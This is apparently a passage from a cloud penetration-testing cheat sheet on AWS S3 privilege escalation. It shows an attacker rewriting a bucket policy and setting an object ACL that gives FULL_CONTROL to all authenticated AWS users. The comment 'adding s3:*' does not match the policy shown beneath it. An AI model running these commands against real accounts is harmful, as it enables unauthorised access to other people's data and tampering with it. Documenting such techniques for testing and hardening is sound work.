With access to this permission, an attacker could give themselves permissions over the bucket and its contents.
aws s3api put-bucket-policy --bucket <bucketName> --policy file://new-bucket-policy.json
# new-bucket-policy.json, adding s3:*
{
"Version": "2012-10-17",
"Statement": [
{
"Effect": "Allow",
"Principal": {
"AWS": "arn:aws:iam::1234567890:root"
},
"Action": "s3:ListBucket",
"Resource": "arn:aws:s3:::bucket-name"
},
{
"Effect": "Allow",
"Principal": {
"AWS": "arn:aws:iam::1234567890:user/<userName>"
},
"Action": [
"s3:GetObject"
],
"Resource": "arn:aws:s3:::bucket-name/*"
}
]
}
With access to this permission, an attacker could give themselves permissions over the bucket and its contents.
aws s3api put-object-acl --bucket <bucketName> --key <objectKey> --access-control-policy file://object-acl-policy.json
# object-acl-policy.json, adding the Grantee:Group
{
"Owner": {
"DisplayName": "bucket-owner",
"ID": "lsjdflsdflnwelknwlefnl23423423423lk234"
},
"Grants": [
{
"Grantee": {
"DisplayName": "bucket-owner",
"ID": "lsjdflsdflnwelknwlefnl23423423423lk234",
"Type": "CanonicalUser"
},
"Permission": "FULL_CONTROL"
},
{
"Grantee": {
"Type": "Group",
"URI": "http://acs.amazonaws.com/groups/global/AuthenticatedUsers"
},
"Permission": "FULL_CONTROL"
}
]
}
